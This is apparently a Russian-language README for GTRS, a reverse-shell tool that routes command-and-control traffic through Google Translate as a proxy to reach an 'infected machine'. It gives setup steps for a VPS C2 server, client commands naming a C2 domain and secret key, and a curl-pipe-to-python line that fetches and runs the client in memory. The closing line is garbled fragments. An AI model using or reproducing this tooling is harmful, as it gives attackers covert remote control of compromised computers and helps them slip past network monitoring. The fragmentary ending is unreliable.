
GTRS — реверс-шелл Google Translator
Этот инструмент использует Google Переводчик в качестве прокси для отправки произвольных команд на зараженную машину.
[ЗАРАЖЕННАЯ МАШИНА] ==HTTPS==> [GOOGLE TRANSLATE] ==HTTP==> [C2]
Сначала вам понадобится VPS и домен, бесплатный домен можно получить на Freenom.
Запустите server.py на вашем VPS
python2.7 server.py
Server running on port: 80
Secret Key: e294a11e-bb6f-49ed-b03a-9ec42be55062
Он предоставит вам секретный ключ, который будет использоваться на клиенте.
Запустите клиент на компьютере с доступом к Google Переводчик, указав домен и секретный ключ, сгенерированный сервером.
bash client.sh www.c2server.ml e294a11e-bb6f-49ed-b03a-9ec42be55062
Теперь у вас есть интерактивная оболочка, использующая именованные каналы, ДА вы можете выполнять cd в каталоги.
Сначала нужно скачать бинарный файл или скомпилировать его, затем процесс аналогичен bash-клиенту,
./client_Linux www.c2server.ml e294a11e-bb6f-49ed-b03a-9ec42be55062
С этим клиентом вы можете запускать его на Linux, Mac и Windows, но интерактивной оболочки пока нет.
После прочтения этого поста в блоге я сделал простую адаптацию для выполнения GTRS в памяти: просто отредактируйте хост и ключ в скрипте inmemory-linux.py, затем разместите его на сервере и выполните через curl.
curl https://yourserver.ml/inmemory-linux.py | python
Или вы можете разместить скрипт, используя подход с YouTube.
.bashrc.Problem fixed using User-Agent header to sent data.xmllint, который находится в libxml2-utils